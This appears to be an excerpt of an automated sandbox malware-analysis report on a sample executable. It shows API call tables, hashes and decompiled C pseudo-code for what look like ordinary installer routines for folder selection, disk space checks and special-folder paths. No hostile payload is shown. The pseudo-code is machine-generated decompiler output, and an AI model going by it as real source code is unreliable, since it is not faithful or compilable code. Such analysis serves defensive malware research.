                                                                                                                • SetWindowLongA.USER32 ref: 004048F0
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                                • DeleteObject.GDI32(?), ref: 00404950
                                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                                • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                                • SetWindowLongA.USER32 ref: 00404A98
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404C85
                                                                                                                • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                                • GetDlgItem.USER32 ref: 00404E36
                                                                                                                • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                                • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                                • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                                • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                                                0x0040435c
                                                                                                                0x00404363
                                                                                                                0x0040436f
                                                                                                                0x0040437d
                                                                                                                0x00404385
                                                                                                                0x00404389
                                                                                                                0x0040438f
                                                                                                                0x0040438f
                                                                                                                0x0040439b
                                                                                                                0x0040440f
                                                                                                                0x00404416
                                                                                                                0x004044eb
                                                                                                                0x004044f2
                                                                                                                0x00404501
                                                                                                                0x00404501
                                                                                                                0x00404505
                                                                                                                0x0040450b
                                                                                                                0x00404518
                                                                                                                0x0040451a
                                                                                                                0x0040451a
                                                                                                                0x00404528
                                                                                                                0x0040452d
                                                                                                                0x00404530
                                                                                                                0x00404537
                                                                                                                0x0040453a
                                                                                                                0x00404571
                                                                                                                0x00404573
                                                                                                                0x00404579
                                                                                                                0x00404580
                                                                                                                0x00404582
                                                                                                                0x00404582
                                                                                                                0x0040459e
                                                                                                                0x004045da
                                                                                                                0x00000000
                                                                                                                0x004045a0
                                                                                                                0x004045a3
                                                                                                                0x004045b7
                                                                                                                0x004045b9
                                                                                                                0x00000000
                                                                                                                0x004045b9
                                                                                                                0x0040453c
                                                                                                                0x00404540
                                                                                                                0x0040456f
                                                                                                                0x0040456f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404542
                                                                                                                0x00404542
                                                                                                                0x0040454f
                                                                                                                0x00404554
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404558
                                                                                                                0x0040455a
                                                                                                                0x0040455a
                                                                                                                0x00404565
                                                                                                                0x00404568
                                                                                                                0x0040456d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040456d
                                                                                                                0x004045c8
                                                                                                                0x004045cf
                                                                                                                0x004045d6
                                                                                                                0x004045dd
                                                                                                                0x004045dd
                                                                                                                0x004045e2
                                                                                                                0x004045e4
                                                                                                                0x004045ec
                                                                                                                0x004045f2
                                                                                                                0x004045f2
                                                                                                                0x00404602
                                                                                                                0x0040460c
                                                                                                                0x00404614
                                                                                                                0x0040462a
                                                                                                                0x00404616
                                                                                                                0x0040461a
                                                                                                                0x0040461a
                                                                                                                0x00404614
                                                                                                                0x0040462f
                                                                                                                0x00404634
                                                                                                                0x00404639
                                                                                                                0x00404642
                                                                                                                0x00404642
                                                                                                                0x0040464b
                                                                                                                0x0040464d
                                                                                                                0x0040464d
                                                                                                                0x00404659
                                                                                                                0x00404661
                                                                                                                0x0040466b
                                                                                                                0x0040466b
                                                                                                                0x00404670
                                                                                                                0x00000000
                                                                                                                0x00404670
                                                                                                                0x0040453a
                                                                                                                0x004044f4
                                                                                                                0x004044fb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004044fb
                                                                                                                0x0040441c
                                                                                                                0x00404422
                                                                                                                0x0040443c
                                                                                                                0x00404441
                                                                                                                0x0040444b
                                                                                                                0x00404452
                                                                                                                0x00404461
                                                                                                                0x00404464
                                                                                                                0x00404467
                                                                                                                0x0040446e
                                                                                                                0x00404476
                                                                                                                0x00404479
                                                                                                                0x0040447d
                                                                                                                0x00404484
                                                                                                                0x0040448c
                                                                                                                0x004044e4
                                                                                                                0x0040448e
                                                                                                                0x0040448f
                                                                                                                0x00404496
                                                                                                                0x004044a0
                                                                                                                0x004044a8
                                                                                                                0x004044b5
                                                                                                                0x004044c9
                                                                                                                0x004044cd
                                                                                                                0x004044cd
                                                                                                                0x004044c9
                                                                                                                0x004044d2
                                                                                                                0x004044dd
                                                                                                                0x004044dd
                                                                                                                0x0040448c
                                                                                                                0x00000000
                                                                                                                0x00404441
                                                                                                                0x0040442f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404435
                                                                                                                0x00000000
                                                                                                                0x0040439d
                                                                                                                0x0040439d
                                                                                                                0x004043a9
                                                                                                                0x004043b3
                                                                                                                0x004043c0
                                                                                                                0x004043c0
                                                                                                                0x004043c6
                                                                                                                0x004043cf
                                                                                                                0x004043d8
                                                                                                                0x004043db
                                                                                                                0x004043de
                                                                                                                0x004043e6
                                                                                                                0x004043e9
                                                                                                                0x004043ec
                                                                                                                0x004043f4
                                                                                                                0x004043fb
                                                                                                                0x00404402
                                                                                                                0x00404676
                                                                                                                0x00404688
                                                                                                                0x00404688
                                                                                                                0x0040440d
                                                                                                                0x00000000
                                                                                                                0x0040440d

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 004043A2
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                                • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040448F
                                                                                                                • lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
                                                                                                                • lstrcatA.KERNEL32(?,Call), ref: 004044CD
                                                                                                                • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                                  • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                                  • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                  • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                  • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                  • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                                • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                • API String ID: 2246997448-2678639445
                                                                                                                • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                                • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                                • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                                • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                                                0x00405b88
                                                                                                                0x00405b88
                                                                                                                0x00405b88
                                                                                                                0x00405b8e
                                                                                                                0x00405b93
                                                                                                                0x00405ba4
                                                                                                                0x00405ba4
                                                                                                                0x00405baf
                                                                                                                0x00405bb1
                                                                                                                0x00405bb6
                                                                                                                0x00405bb9
                                                                                                                0x00405bba
                                                                                                                0x00405bc1
                                                                                                                0x00405bc3
                                                                                                                0x00405bc9
                                                                                                                0x00405bcc
                                                                                                                0x00405bcc
                                                                                                                0x00405da5
                                                                                                                0x00405da5
                                                                                                                0x00405da9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405bd9
                                                                                                                0x00405bdf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405be5
                                                                                                                0x00405be6
                                                                                                                0x00405be9
                                                                                                                0x00405bec
                                                                                                                0x00405d98
                                                                                                                0x00405da2
                                                                                                                0x00405da4
                                                                                                                0x00405da4
                                                                                                                0x00405d9a
                                                                                                                0x00405d9c
                                                                                                                0x00405d9e
                                                                                                                0x00405d9f
                                                                                                                0x00405d9f
                                                                                                                0x00000000
                                                                                                                0x00405d98
                                                                                                                0x00405bf2
                                                                                                                0x00405bf6
                                                                                                                0x00405c06
                                                                                                                0x00405c0a
                                                                                                                0x00405c11
                                                                                                                0x00405c14
                                                                                                                0x00405c18
                                                                                                                0x00405c1e
                                                                                                                0x00405c21
                                                                                                                0x00405c24
                                                                                                                0x00405c27
                                                                                                                0x00405d42
                                                                                                                0x00405d45
                                                                                                                0x00405d75
                                                                                                                0x00405d78
                                                                                                                0x00405d7d
                                                                                                                0x00405d81
                                                                                                                0x00405d81
                                                                                                                0x00405d86
                                                                                                                0x00405d87
                                                                                                                0x00405d8c
                                                                                                                0x00405d8f
                                                                                                                0x00405d91
                                                                                                                0x00000000
                                                                                                                0x00405d91
                                                                                                                0x00405d47
                                                                                                                0x00405d4a
                                                                                                                0x00405d5f
                                                                                                                0x00405d66
                                                                                                                0x00405d4c
                                                                                                                0x00405d53
                                                                                                                0x00405d53
                                                                                                                0x00405d6e
                                                                                                                0x00405d71
                                                                                                                0x00405d3a
                                                                                                                0x00405d3b
                                                                                                                0x00405d3b
                                                                                                                0x00000000
                                                                                                                0x00405d71
                                                                                                                0x00405c2f
                                                                                                                0x00405c30
                                                                                                                0x00405c36
                                                                                                                0x00405c38
                                                                                                                0x00405c52
                                                                                                                0x00405c52
                                                                                                                0x00405c59
                                                                                                                0x00405c59
                                                                                                                0x00405c60
                                                                                                                0x00405c64
                                                                                                                0x00405c64
                                                                                                                0x00405c65
                                                                                                                0x00405c67
                                                                                                                0x00405ca0
                                                                                                                0x00405ca3
                                                                                                                0x00405cb3
                                                                                                                0x00405cb6
                                                                                                                0x00405cbe
                                                                                                                0x00405cc4
                                                                                                                0x00405cc4
                                                                                                                0x00405d20
                                                                                                                0x00405d20
                                                                                                                0x00405d22
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405cc8
                                                                                                                0x00405ccf
                                                                                                                0x00405cd0
                                                                                                                0x00405cd2
                                                                                                                0x00405cec
                                                                                                                0x00405cfa
                                                                                                                0x00405d00
                                                                                                                0x00405d02
                                                                                                                0x00405d1d
                                                                                                                0x00405d1d
                                                                                                                0x00405d1d
                                                                                                                0x00000000
                                                                                                                0x00405d1d
                                                                                                                0x00405d08
                                                                                                                0x00405d13
                                                                                                                0x00405d19
                                                                                                                0x00405d1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405d1b
                                                                                                                0x00405cd4
                                                                                                                0x00405cd7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405ce6
                                                                                                                0x00405ce8
                                                                                                                0x00405cea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405cea
                                                                                                                0x00000000
                                                                                                                0x00405d20
                                                                                                                0x00405cab
                                                                                                                0x00000000
                                                                                                                0x00405c69
                                                                                                                0x00405c6e
                                                                                                                0x00405c84
                                                                                                                0x00405c89
                                                                                                                0x00405c8c
                                                                                                                0x00405d29
                                                                                                                0x00405d29
                                                                                                                0x00405d2d
                                                                                                                0x00405d35
                                                                                                                0x00405d35
                                                                                                                0x00000000
                                                                                                                0x00405d2d
                                                                                                                0x00405c96
                                                                                                                0x00405d24
                                                                                                                0x00405d24
                                                                                                                0x00405d27
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405d27
                                                                                                                0x00405c67
                                                                                                                0x00405c3a
                                                                                                                0x00405c3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405c40
                                                                                                                0x00405c44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405c46
                                                                                                                0x00405c4a
                                                                                                                0x00000000
                                                                                                                0x00405c4c
                                                                                                                0x00405c4c
                                                                                                                0x00000000
                                                                                                                0x00405c4c
                                                                                                                0x00405c4a
                                                                                                                0x00405daf
                                                                                                                0x00405db9
                                                                                                                0x00405dc5
                                                                                                                0x00405dc5
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                                • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                                • lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
